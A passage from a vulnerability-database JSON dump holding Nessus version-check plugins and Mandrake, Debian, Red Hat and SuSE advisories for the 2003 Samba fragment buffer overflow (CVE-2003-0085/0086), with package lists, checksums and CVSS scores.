\"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"samba-client-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"samba-common-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"samba-doc-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"samba-server-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.0\", cpu:\"i386\", reference:\"samba-swat-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"samba-client-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"samba-common-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"samba-doc-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"samba-server-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"samba-swat-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"nss_wins-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"samba-client-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"samba-common-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"samba-doc-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"samba-server-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"samba-swat-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"samba-winbind-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"nss_wins-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"samba-client-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"samba-common-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"samba-doc-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"samba-server-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"samba-swat-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"samba-winbind-2.2.7a-8.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:08:09", "bulletinFamily": "scanner", "description": "Sebastian Krahmer of the SuSE security audit team found two problems in samba, a popular SMB/CIFS implementation. The problems are :\n\n - a buffer overflow in the SMB/CIFS packet fragment re-assembly code used by smbd. Since smbd runs as root an attacker can use this to gain root access to a machine running smbd.\n - the code to write reg files was vulnerable for a chown race which made it possible for a local user to overwrite system files\n\nBoth problems have been fixed in upstream version 2.2.8, and version 2.2.3a-12.1 of package for Debian GNU/Linux 3.0/woody.", "modified": "2018-07-20T00:00:00", "id": "DEBIAN_DSA-262.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=15099", "published": "2004-09-29T00:00:00", "title": "Debian DSA-262-1 : samba - remote exploit", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-262. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(15099);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/07/20 2:17:10\");\n\n script_cve_id(\"CVE-2003-0085\", \"CVE-2003-0086\");\n script_bugtraq_id(7106, 7107);\n script_xref(name:\"DSA\", value:\"262\");\n\n script_name(english:\"Debian DSA-262-1 : samba - remote exploit\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sebastian Krahmer of the SuSE security audit team found two problems\nin samba, a popular SMB/CIFS implementation. The problems are :\n\n - a buffer overflow in the SMB/CIFS packet fragment\n re-assembly code used by smbd. Since smbd runs as root\n an attacker can use this to gain root access to a\n machine running smbd.\n - the code to write reg files was vulnerable for a chown\n race which made it possible for a local user to\n overwrite system files\n\nBoth problems have been fixed in upstream version 2.2.8, and version\n2.2.3a-12.1 of package for Debian GNU/Linux 3.0/woody.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2003/dsa-262\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected samba package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"libpam-smbpass\", reference:\"2.2.3a-12.1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libsmbclient\", reference:\"2.2.3a-12.1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libsmbclient-dev\", reference:\"2.2.3a-12.1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"samba\", reference:\"2.2.3a-12.1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"samba-common\", reference:\"2.2.3a-12.1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"samba-doc\", reference:\"2.2.3a-12.1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"smbclient\", reference:\"2.2.3a-12.1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"smbfs\", reference:\"2.2.3a-12.1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"swat\", reference:\"2.2.3a-12.1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"winbind\", reference:\"2.2.3a-12.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:07:46", "bulletinFamily": "scanner", "description": "The remote Samba server, according to its version number, is vulnerable to a remote buffer overflow when receiving specially crafted SMB fragment packets.\n\nAn attacker needs to be able to access at least one share to exploit this flaw.\n\nIn addition, it is reported that Samba contains a flaw related to the handling of .reg files that may allow a local user to overwrite arbitrary file.", "modified": "2018-07-27T00:00:00", "id": "SAMBA_FRAGS_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=11398", "published": "2003-03-15T00:00:00", "title": "Samba < 2.2.8 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Ref: \n# From: Wichert Akkerman <wichert@wiggy.net>\n# Subject: [SECURITY] [DSA-262-1] samba security fix\n# Resent-Message-ID: <VvQa6C.A.oDH.Ng1c-@murphy>\n# To: bugtraq@securityfocus.com\n#\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(11398);\n script_version (\"1.21\");\n\n script_cve_id(\"CVE-2003-0085\", \"CVE-2003-0086\");\n script_bugtraq_id(7106, 7107);\n script_xref(name:\"RHSA\", value:\"2003:095-03\");\n script_xref(name:\"SuSE\", value:\"SUSE-SA:2003:016\");\n\n script_name(english: \"Samba < 2.2.8 Multiple Vulnerabilities\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code may be run on the remote server.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote Samba server, according to its version number, is vulnerable\nto a remote buffer overflow when receiving specially crafted SMB \nfragment packets.\n\nAn attacker needs to be able to access at least one share to exploit \nthis flaw.\n\nIn addition, it is reported that Samba contains a flaw\nrelated to the handling of .reg files that may allow\na local user to overwrite arbitrary file.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Samba 2.2.8.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\nscript_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2003/03/15\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2003/03/15\");\n script_cvs_date(\"Date: 2018/07/27 18:38:14\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:samba:samba\");\nscript_end_attributes();\n\n script_summary(english: \"checks samba version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.\");\n script_family(english: \"Gain a shell remotely\");\n script_dependencie(\"smb_nativelanman.nasl\");\n script_require_keys(\"SMB/NativeLanManager\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\nlanman = get_kb_item(\"SMB/NativeLanManager\");\nif(\"Samba\" >< lanman)\n{\n if(ereg(pattern:\"Samba 2\\.(0\\..*|2\\.[0-7][^0-9].*)\", string:lanman))security_hole(139);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:07:52", "bulletinFamily": "scanner", "description": "Updated Samba packages are now available to fix security vulnerabilities found during a code audit.\n\nSamba is a suite of utilities which provides file and printer sharing services to SMB/CIFS clients.\n\nSebastian Krahmer discovered a security vulnerability present in unpatched versions of Samba prior to 2.2.8. An anonymous user could use the vulnerability to gain root access on the target machine.\n\nAdditionally, a race condition could allow an attacker to overwrite critical system files.\n\nAll users of Samba are advised to update to the erratum packages which contain patches to correct these vulnerabilities.\n\nThese packages contain the security fixes backported to the Samba 2.2.7 codebase.", "modified": "2018-11-27T00:00:00", "id": "REDHAT-RHSA-2003-096.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=12379", "published": "2004-07-06T00:00:00", "title": "RHEL 2.1 : samba (RHSA-2003:096)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2003:096. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(12379);\n script_version (\"1.28\");\n script_cvs_date(\"Date: 2018/11/27 13:31:31\");\n\n script_cve_id(\"CVE-2003-0085\", \"CVE-2003-0086\", \"CVE-2003-1332\");\n script_xref(name:\"RHSA\", value:\"2003:096\");\n\n script_name(english:\"RHEL 2.1 : samba (RHSA-2003:096)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated Samba packages are now available to fix security\nvulnerabilities found during a code audit.\n\nSamba is a suite of utilities which provides file and printer sharing\nservices to SMB/CIFS clients.\n\nSebastian Krahmer discovered a security vulnerability present in\nunpatched versions of Samba prior to 2.2.8. An anonymous user could\nuse the vulnerability to gain root access on the target machine.\n\nAdditionally, a race condition could allow an attacker to overwrite\ncritical system files.\n\nAll users of Samba are advised to update to the erratum packages which\ncontain patches to correct these vulnerabilities.\n\nThese packages contain the security fixes backported to the Samba\n2.2.7 codebase.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0085\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0086\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-1332\"\n );\n # http://www.samba.org/samba/whatsnew/samba-2.2.8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/history/samba-2.2.10.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2003:096\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2003:096\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"samba-2.2.7-2.21as\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"samba-client-2.2.7-2.21as\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"samba-common-2.2.7-2.21as\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"samba-swat-2.2.7-2.21as\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba / samba-client / samba-common / samba-swat\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:47:01", "bulletinFamily": "unix", "description": "Sebastian Krahmer, SuSE Security Team, reviewed security-critical parts of the Samba server within the scope of security audits that the SuSE Security Team conducts on a regular basis for security-critical Open Source Software. Buffer overflows and a chown race condition have been discovered and fixed during the security audit. The buffer overflow vulnerabilitiy allows a remote attacker to execute arbitrary commands as root on the system running samba. In addition to the flaws fixed in the samba server, some overflow conditions in the samba-client package have been fixed with the available update packages. It is strongly recommended to install the update packages on a system where the samba package is used.", "modified": "2003-03-19T11:29:42", "published": "2003-03-19T11:29:42", "id": "SUSE-SA:2003:015", "href": "http://lists.opensuse.org/opensuse-security-announce/2003-03/msg00016.html", "type": "suse", "title": "remote command execution in samba, samba-client", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:23:22", "bulletinFamily": "unix", "description": "Sebastian Krahmer, SuSE Security Team, reviewed security-critical parts of the Samba server within the scope of security audits that the SuSE Security Team conducts on a regular basis for security-critical Open Source Software. Buffer overflows and a chown race condition have been discovered and fixed during the security audit. The buffer overflow vulnerabilitiy allows a remote attacker to execute arbitrary commands as root on the system running samba. In addition to the flaws fixed in the samba server, some overflow conditions in the samba-client package have been fixed with the available update packages. It is strongly recommended to install the update packages on a system where the samba package is used.", "modified": "2003-03-19T12:06:10", "published": "2003-03-19T12:06:10", "id": "SUSE-SA:2003:016", "href": "http://lists.opensuse.org/opensuse-security-announce/2003-03/msg00017.html", "title": "remote command execution in samba, samba-client", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2019-05-30T02:21:59", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-262-1 security@debian.org\nhttp://www.debian.org/security/ Wichert Akkerman\nMarch 15, 2003\n- ------------------------------------------------------------------------\n\n\nPackage : samba\nProblem type : remote exploit\nDebian-specific: no\nCVE ids : CAN-2003-0085 CAN-2003-0086\n\nSebastian Krahmer of the SuSE security audit team found two problems\nin samba, a popular SMB/CIFS implementation. The problems are:\n\n* a buffer overflow in the SMB/CIFS packet fragment re-assembly code\n used by smbd. Since smbd runs as root an attacker can use this to\n gain root access to a machine running smbd.\n\n* the code to write reg files was vulnerable for a chown race which made\n it possible for a local user to overwrite system files\n\nBoth problems have been fixed in upstream version 2.2.8, and version\n2.2.3a-12.1 of package for Debian GNU/Linux 3.0/woody.\n\n- ------------------------------------------------------------------------\n\nObtaining updates:\n\n By hand:\n wget URL\n will fetch the file for you.\n dpkg -i FILENAME.deb\n will install the fetched file.\n\n With apt:\n deb http://security.debian.org/ stable/updates main\n added to /etc/apt/sources.list will provide security updates\n\nAdditional information can be found on the Debian security webpages\nat http://www.debian.org/security/\n\n- ------------------------------------------------------------------------\n\n\nDebian GNU/Linux 2.2 alias potato\n- ---------------------------------\n\n No fixes for potato are available at this moment.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Woody was released for alpha, arm, hppa, i386, ia64, m68k, mips, mipsel,\n powerpc, s390 and sparc. Updated packages for m68k are not available\n at this moment.\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1.dsc\n Size/MD5 checksum: 1417 f8ba1f1c191d72245498fe8517b34dfb\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a.orig.tar.gz\n Size/MD5 checksum: 5460531 b6ec2f076af69331535a82b586f55254\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1.diff.gz\n Size/MD5 checksum: 105954 c4f722541096dbdc492b3e37d532a457\n\n Architecture independent packages:\n\n http://security.debian.org/pool/updates/main/s/samba/samba-doc_2.2.3a-12.1_all.deb\n Size/MD5 checksum: 2446596 09b98f69fe6fa23543824c13c5ef98c5\n\n alpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_alpha.deb\n Size/MD5 checksum: 622740 53102afe9bc7357abaac9e6d163cff15\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_alpha.deb\n Size/MD5 checksum: 600148 cdb00b063309e1bc314c013a2ab7df9d\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_alpha.deb\n Size/MD5 checksum: 1131054 9cf909b0e8b1a71945addbdb0a5b4051\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_alpha.deb\n Size/MD5 checksum: 949532 3310dbdefcc1062ad3d940df6448d106\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_alpha.deb\n Size/MD5 checksum: 1106444 26f1822f7a466d546b8d131e244b9403\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_alpha.deb\n Size/MD5 checksum: 2955638 108a1e79c6e0f4d35d239fa0da5d2af2\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_alpha.deb\n Size/MD5 checksum: 415342 1e0d39fbdd1b4adabc4e83efc9652ade\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_alpha.deb\n Size/MD5 checksum: 489330 4cc41e31ca14bca6c627885bf4158306\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_alpha.deb\n Size/MD5 checksum: 1155752 96fc4d4fba8d5144eca524dab0d3f676\n\n arm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_arm.deb\n Size/MD5 checksum: 999684 e9a198658e31008f2029911fa8f3e6c6\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_arm.deb\n Size/MD5 checksum: 829522 62dec09d61eacb27021e2bd7285a1485\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_arm.deb\n Size/MD5 checksum: 555796 cf1ed859a65e3918290b046ebb94714e\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_arm.deb\n Size/MD5 checksum: 460742 b76711eedb3c58557919017bef9b66f3\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_arm.deb\n Size/MD5 checksum: 1021712 6274000513467291e4e2e636e49e3caa\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_arm.deb\n Size/MD5 checksum: 546112 1e971721816bd8c5dfdc76e853adc81f\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_arm.deb\n Size/MD5 checksum: 972556 2b2785914b1de3cd4f5b54a71aafa977\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_arm.deb\n Size/MD5 checksum: 2541432 52be6e56a2870f7bbb88ed00fb4e6197\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_arm.deb\n Size/MD5 checksum: 396296 ba0077d84e96b8de2958a1a3d0b0c7ab\n\n hppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_hppa.deb\n Size/MD5 checksum: 2790802 666ba6b6075a9c43d44cee7d66ed654d\n http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12.1_hppa.deb\n Size/MD5 checksum: 589754 6d80091312fc5a721ab3216785fd8d73\n http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12.1_hppa.deb\n Size/MD5 checksum: 1081314 09ea41541c03f8e1c7da6a6c3e6bb437\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12.1_hppa.deb\n Size/MD5 checksum: 490812 2757ce04bf7ba705992ef6c5b42da943\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_hppa.deb\n Size/MD5 checksum: 1084730 84eb32632058606e10dfc8b4d7a72552\n http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12.1_hppa.deb\n Size/MD5 checksum: 589142 df11a8ed279bcc3461ca8a2a08c5e1db\n http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12.1_hppa.deb\n Size/MD5 checksum: 901054 75e9ed419e91cce810e286f245b7a5ed\n http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12.1_hppa.deb\n Size/MD5 checksum: 419358 a90c8c66a1370a973a8d757c112704e0\n http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12.1_hppa.deb\n Size/MD5 checksum: 1059718 c8bcd60bc3d799753215fffd840aec78\n\n i386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12.1_i386.deb\n Size/MD5 checksum: 953846 2ddc41e683b123557c4f95a6d729f650\n http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.1_i386.deb\n Size/MD5 checksum: 2417120 